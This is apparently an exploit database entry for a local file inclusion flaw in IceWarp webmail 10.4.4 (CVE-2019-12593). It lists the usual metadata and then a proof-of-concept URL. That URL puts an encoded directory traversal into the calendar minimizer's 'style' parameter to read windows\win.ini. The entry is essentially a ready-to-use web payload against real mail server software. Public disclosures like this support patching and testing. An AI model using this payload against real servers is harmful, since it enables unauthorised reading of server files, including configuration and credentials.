IceWarp 10.4.4 - Local File Inclusion

Author: JameelNabbo
type: webapps
platform: php
port: 
date_added: 2019-06-04  
date_updated: 2019-06-04  
verified: 0  
codes: CVE-2019-12593  
tags: File Inclusion (LFI/RFI)  
aliases:   
screenshot_url:   
application_url:   

raw file: 46959.txt  

# Exploit Title: IceWarp <=10.4.4 local file include
# Date: 02/06/2019
# Exploit Author: JameelNabbo
# Website: uitsec.com
# Vendor Homepage: http://www.icewarp.com
# Software Link: https://www.icewarp.com/downloads/trial/
# Version: 10.4.4
# Tested on: Windows 10
# CVE: CVE-2019-12593
POC:

http://example.com/webmail/calendar/minimizer/index.php?style=[LFI]

Example:
http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini